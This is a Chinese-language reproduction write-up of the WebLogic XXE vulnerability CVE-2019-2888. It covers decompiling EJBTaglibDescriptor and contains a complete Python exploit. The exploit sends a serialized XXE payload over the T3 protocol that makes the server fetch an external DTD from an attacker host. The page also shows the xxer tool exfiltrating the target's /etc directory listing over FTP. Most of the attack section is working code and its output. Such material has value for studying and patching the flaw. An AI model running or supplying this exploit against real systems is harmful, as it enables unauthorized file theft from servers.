跳转至

CVE-2019-2888 WebLogic EJBTaglibDescriptor XXE漏洞

一、漏洞简介

二、漏洞影响

WebLogic Server 10.3.6.0.0版本、12.1.3.0.0版本和12.2.1.3.0版本的EJB Container组件存在安全漏洞

三、复现过程

fernflower.jar

weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class
╭─root@jas502n /var 
╰─# find ./ |grep EJBTaglibDescriptor                                                                       ✔  838818:32:43 
.//weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class
.//weblogic.jar/weblogic/servlet/ejb2jsp/gui/EJBTaglibDescriptorTree.class
.//weblogic.jar/weblogic/servlet/ejb2jsp/gui/EJBTaglibDescriptorPanel.class
╭─root@jas502n /var 
╰─# ls                                                                                                      ✔  839218:33:22 
EJBTaglibDescriptor.java fernflower.jar           weblogic.jar

EJBTaglibDescriptor.class to EJBTaglibDescriptor.java

╭─root@jas502n /var 
╰─# java -jar fernflower.jar .//weblogic.jar/weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor.class ./
 ./
INFO:  Decompiling class weblogic/servlet/ejb2jsp/dd/EJBTaglibDescriptor
INFO:  ... done
╭─root@jas502n /var 
╰─# ls            
EJBTaglibDescriptor.java fernflower.jar           weblogic.jar
╭─root@jas502n /var 
╰─# cat EJBTaglibDescriptor.java

package weblogic.servlet.ejb2jsp.dd;

import java.io.Externalizable;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.ObjectInput;
import java.io.ObjectOutput;
import java.io.Reader;
import java.io.StringReader;
import java.io.StringWriter;
import java.util.ArrayList;
import java.util.Collection;
import java.util.Enumeration;
import java.util.Iterator;
import java.util.List;
import javax.xml.parsers.DocumentBuilder;
import org.w3c.dom.Element;
import org.xml.sax.InputSource;
import weblogic.servlet.ejb2jsp.BeanGenerator;
import weblogic.servlet.ejb2jsp.EJBMethodGenerator;
import weblogic.servlet.ejb2jsp.EJBTaglibGenerator;
import weblogic.servlet.ejb2jsp.HomeCollectionGenerator;
import weblogic.servlet.ejb2jsp.HomeFinderGenerator;
import weblogic.servlet.ejb2jsp.HomeMethodGenerator;
import weblogic.servlet.internal.dd.ToXML;
import weblogic.utils.Getopt2;
import weblogic.utils.classloaders.ClasspathClassLoader;
import weblogic.utils.io.XMLWriter;
import weblogic.xml.dom.DOMProcessingException;
import weblogic.xml.dom.DOMUtils;
import weblogic.xml.jaxp.WebLogicDocumentBuilderFactory;

public class EJBTaglibDescriptor implements ToXML, Externalizable {
   private static final long serialVersionUID = -9016538269900747655L;
   private FilesystemInfoDescriptor fileInfo;
   private BeanDescriptor[] beans;
   private transient ClassLoader jarLoader;
   private static final String PREAMBLE = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\n<!DOCTYPE ejb2jsp-taglib PUBLIC \"-//BEA Systems, Inc.//DTD EJB2JSP Taglib 1.0//EN\" \"http://www.bea.com/servers/wls600/dtd/weblogic-ejb2jsp.dtd\">";

   static void p(String var0) {
      System.err.println("[EJBTagDesc]: " + var0);
   }

漏洞利用

poc

#coding=utf-8
#!/usr/bin/python
import socket
import sys
import struct

banner = '''

 _       __     __    __            _         _  ___  __ ______
| |     / /__  / /_  / /___  ____ _(_)____   | |/ / |/ // ____/
| | /| / / _ \/ __ \/ / __ \/ __ `/ / ___/   |   /|   // __/   
| |/ |/ /  __/ /_/ / / /_/ / /_/ / / /__    /   |/   |/ /___   
|__/|__/\___/_.___/_/\____/\__, /_/\___/   /_/|_/_/|_/_____/   
                          /____/                               

     CVE-2019-2888 WebLogic EJBTaglibDescriptor XXE漏洞

                  python By jas502n


'''
print banner

def payload(ip,port):

    s1 = 'aced00057372002f7765626c6f6769632e736572766c65742e656a62326a73702e64642e454a425461676c696244657363726970746f7282ded23716d9cc790c000078707a0000'
    s2 = '041a3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e3c21444f435459504520786d6c726f6f746e616d65205b3c21454e544954592025206161612053595354454d2022687474703a2f2f'
    s3 = ('%s:%s'%(ip,port)).encode('hex') 
    s4 = '2f6578742e647464223e256161613b256363633b256464643b5d3e2f7777772e6265612e636f6d2f736572766572732f776c733630302f6474642f7765626c6f6769632d656a62326a73702e647464223e0a3c656a62326a73702d7461676c69623e0a20203c66696c6573797374656d2d696e666f3e0a202020203c6a617661632d706174683e3c2f6a617661632d706174683e0a202020203c6a617661632d666c6167733e3c2f6a617661632d666c6167733e0a202020203c636f6d70696c652d636c617373706174683e0a202020203c2f636f6d70696c652d636c617373706174683e0a202020203c6b65657067656e6572617465643e66616c73653c2f6b65657067656e6572617465643e0a202020203c736f757263652d706174683e0a202020203c2f736f757263652d706174683e0a202020203c7061636b6167652d6e616d653e3c2f7061636b6167652d6e616d653e0a202020203c656a622d6a61722d66696c653e3c2f656a622d6a61722d66696c653e0a202020203c736176652d61733e3c2f736176652d61733e0a202020203c736176652d7461676c69622d6a61723e0a2020202020203c746d706469723e3c2f746d706469723e0a2020202020203c7461676c69622d6a61722d66696c653e3c2f7461676c69622d6a61722d66696c653e0a202020203c2f736176652d7461676c69622d6a61723e0a202020203c736176652d7461676c69622d6469726563746f72793e0a2020202020203c636c61737365732d6469726563746f72793e3c2f636c61737365732d6469726563746f72793e0a2020202020203c746c642d66696c653e3c2f746c642d66696c653e0a202020203c2f736176652d7461676c69622d6469726563746f72793e0a20203c2f66696c6573797374656d2d696e666f3e0a20203c656a623e0a202020203c656a622d6e616d653e3c2f656a622d6e616d653e0a202020203c72656d6f74652d747970653e3c2f72656d6f74652d747970653e0a202020203c686f6d652d747970653e3c2f686f6d652d747970653e0a202020203c6a6e64692d6e616d653e3c2f6a6e64692d6e616d653e0a202020203c656a622d747970653e3c2f656a622d747970653e0a202020203c656e61626c65643e747275653c2f656e61626c65643e0a202020203c656a622d6d6574686f64733e0a202020203c2f656a622d6d6574686f64733e0a202020203c686f6d652d6d6574686f64733e0a202020203c2f686f6d652d6d6574686f64733e'
    s5 = '0' + hex(len((s2 + s3 + s4).decode('hex')))[2:]
    s6 = '771c0a20203c2f656a623e0a3c2f656a62326a73702d7461676c69623e0a78'
    payloadObj = (s1 + s5 + (s2 + s3 + s4) + s6).decode('hex')
    send_poc(payloadObj)


def send_poc(payloadObj):

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    server_address = (sys.argv[1], int(sys.argv[2]))
    print 'connecting to %s port %s' % server_address
    sock.connect(server_address)

    # Send headers
    headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
    print 'sending "%s"' % headers
    sock.sendall(headers)

    data = sock.recv(1024)
    print >>sys.stderr, 'received "%s"' % data

    # payloadObj = open(sys.argv[3],'rb').read()

    payload='\x00\x00\x09\xf3\x01\x65\x01\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x71\x00\x00\xea\x60\x00\x00\x00\x18\x43\x2e\xc6\xa2\xa6\x39\x85\xb5\xaf\x7d\x63\xe6\x43\x83\xf4\x2a\x6d\x92\xc9\xe9\xaf\x0f\x94\x72\x02\x79\x73\x72\x00\x78\x72\x01\x78\x72\x02\x78\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x70\x70\x70\x70\x70\x00\x00\x00\x0c\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x70\x06\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x03\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x03\x78\x70\x77\x02\x00\x00\x78\xfe\x01\x00\x00'
    payload=payload+payloadObj
    payload=payload+'\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x1d\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x43\x6c\x61\x73\x73\x54\x61\x62\x6c\x65\x45\x6e\x74\x72\x79\x2f\x52\x65\x81\x57\xf4\xf9\xed\x0c\x00\x00\x78\x70\x72\x00\x21\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x65\x65\x72\x49\x6e\x66\x6f\x58\x54\x74\xf3\x9b\xc9\x08\xf1\x02\x00\x07\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x74\x00\x27\x5b\x4c\x77\x65\x62\x6c\x6f\x67\x69\x63\x2f\x63\x6f\x6d\x6d\x6f\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\x3b\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x56\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x97\x22\x45\x51\x64\x52\x46\x3e\x02\x00\x03\x5b\x00\x08\x70\x61\x63\x6b\x61\x67\x65\x73\x71\x00\x7e\x00\x03\x4c\x00\x0e\x72\x65\x6c\x65\x61\x73\x65\x56\x65\x72\x73\x69\x6f\x6e\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x12\x76\x65\x72\x73\x69\x6f\x6e\x49\x6e\x66\x6f\x41\x73\x42\x79\x74\x65\x73\x74\x00\x02\x5b\x42\x78\x72\x00\x24\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x63\x6f\x6d\x6d\x6f\x6e\x2e\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x50\x61\x63\x6b\x61\x67\x65\x49\x6e\x66\x6f\xe6\xf7\x23\xe7\xb8\xae\x1e\xc9\x02\x00\x09\x49\x00\x05\x6d\x61\x6a\x6f\x72\x49\x00\x05\x6d\x69\x6e\x6f\x72\x49\x00\x0b\x70\x61\x74\x63\x68\x55\x70\x64\x61\x74\x65\x49\x00\x0c\x72\x6f\x6c\x6c\x69\x6e\x67\x50\x61\x74\x63\x68\x49\x00\x0b\x73\x65\x72\x76\x69\x63\x65\x50\x61\x63\x6b\x5a\x00\x0e\x74\x65\x6d\x70\x6f\x72\x61\x72\x79\x50\x61\x74\x63\x68\x4c\x00\x09\x69\x6d\x70\x6c\x54\x69\x74\x6c\x65\x71\x00\x7e\x00\x05\x4c\x00\x0a\x69\x6d\x70\x6c\x56\x65\x6e\x64\x6f\x72\x71\x00\x7e\x00\x05\x4c\x00\x0b\x69\x6d\x70\x6c\x56\x65\x72\x73\x69\x6f\x6e\x71\x00\x7e\x00\x05\x78\x70\x77\x02\x00\x00\x78\xfe\x00\xff\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x46\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x0b\x75\x73\x2d\x6c\x2d\x62\x72\x65\x65\x6e\x73\xa5\x3c\xaf\xf1\x00\x00\x00\x07\x00\x00\x1b\x59\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\x00\x78\xfe\x01\x00\x00\xac\xed\x00\x05\x73\x72\x00\x13\x77\x65\x62\x6c\x6f\x67\x69\x63\x2e\x72\x6a\x76\x6d\x2e\x4a\x56\x4d\x49\x44\xdc\x49\xc2\x3e\xde\x12\x1e\x2a\x0c\x00\x00\x78\x70\x77\x1d\x01\x81\x40\x12\x81\x34\xbf\x42\x76\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\xa5\x3c\xaf\xf1\x00\x00\x00\x00\x00\x78'

    # adjust header for appropriate message length
    payload = "{0}{1}".format(struct.pack('!i', len(payload)), payload[4:])

    print 'sending payload...'
    sock.send(payload)

if __name__ == '__main__':
    if len(sys.argv) !=3:
        sys.exit("[+] Usage: python %s weblogic_ip weblogic_port\n" % sys.argv[0])
    # dtd http server
    # http://10.10.20.166:8989/
    # ip = '10.10.20.100'
    # port = '8989'
    ip = raw_input("[+] XXE_IP= ")
    port = raw_input("[+] XXE_IP= ")
    print "[+] http://" + ip + ':' + port + '/ext.dtd\n'
    payload(ip,port)

下载python xxer

https://github.com/ianxtianxt/CVE-2019-2888

info: Starting xxer_httpd on port 8989

info: Starting xxer_ftpd on port 2121

http://10.10.20.100:8989/ext.dtd
python xxer.py -p 8989 -H 10.10.20.100

 _ _ _ _ ___ ___
|_'_|_'_| -_|  _|
|_,_|_,_|___|_|

version 1.1

info: Old DTD found. This file is going to be deleted.
info: Generating new DTD file.
info: Starting xxer_httpd on port 8989
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://10.10.20.100:8989/ext.dtd">%aaa;%ccc;%ddd;]>

通过T3协议,发送序列化后的xml payload

ale@Pentest: ~/Desktop/CVE-2019-2888# python weblogic.py 10.10.20.100 7001                                                 


 _       __     __    __            _         _  ___  __ ______
| |     / /__  / /_  / /___  ____ _(_)____   | |/ / |/ // ____/
| | /| / / _ \/ __ \/ / __ \/ __ `/ / ___/   |   /|   // __/
| |/ |/ /  __/ /_/ / / /_/ / /_/ / / /__    /   |/   |/ /___
|__/|__/\___/_.___/_/\____/\__, /_/\___/   /_/|_/_/|_/_____/
                          /____/

     CVE-2019-2888 WebLogic EJBTaglibDescriptor XXE漏洞

                  python By jas502n



[+] XXE_IP= 10.10.20.166
[+] XXE_IP= 8989
[+] http://10.10.20.166:8989/ext.dtd

connecting to 10.10.20.100 port 7001
sending "t3 12.2.1
AS:255
HL:19
MS:10000000
PU:t3://us-l-breens:7001

"
received "HELO"
sending payload...

ale@Pentest: ~/Desktop/CVE-2019-2888#

get /etc dir info

root@kali:~/xxer# python xxer.py -p 8989 -H 10.10.20.166

 _ _ _ _ ___ ___
|_'_|_'_| -_|  _|
|_,_|_,_|___|_|

version 1.1

info: Old DTD found. This file is going to be deleted.
info: Generating new DTD file.
info: Starting xxer_httpd on port 8989
info: Starting xxer_ftpd on port 2121
info: Servers started. Use the following payload (with URL-encoding):

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://10.10.20.166:8989/ext.dtd">%aaa;%ccc;%ddd;]>


10.10.20.100 - - [01/Nov/2019 12:58:42] "GET /ext.dtd HTTP/1.1" 200 -
info: FTP: recvd 'USER fakeuser'
info: FTP: recvd 'PASS .pwd.lock
adduser.conf
alternatives
apparmor
apparmor.d
apt
bash_completion.d
bash.bashrc
bindresvport.blacklist
blkid.conf
blkid.tab
ca-certificates
ca-certificates.conf
console-setup
cron.d
cron.daily
cron.hourly
cron.monthly
cron.weekly
crontab
dbus-1
debconf.conf
debian_version